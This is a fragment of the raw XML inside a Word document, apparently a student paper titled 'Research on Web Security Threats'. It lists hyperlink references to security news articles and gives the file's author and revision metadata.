TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.bleepingcomputer.com/news/security/thousands-of-apps-leak-sensitive-data-via-misconfigured-firebase-backends/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://digitalsuccess.lll-ll.com/?i=4078803"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isecurity.org/wp-content/uploads/2020/07/The-2020-Verizon-Data-Breach-Investigations-Report-DBIR.pdf" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://techcrunch.com/2010/09/21/warning-mouseover-tweets-security-flaw-is-wreaking-havoc-on-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INTERNET APPPLICATION PROGRAMMING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D14D8-2DB0-4557-B48B-32CB1EE9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Research on Web Security Threats</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on Web Security Threats</dc:title>
  <dc:subject>C028/401616/2023</dc:subject>
  <dc:creator>LECTURER:</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Marvelous Heavenly</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-04T21:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-24T07:11:00Z</dcterms:modified>
  <cp:category>DR.RICHARD OMOLO.</cp:category>
</cp:coreProperties>
</file>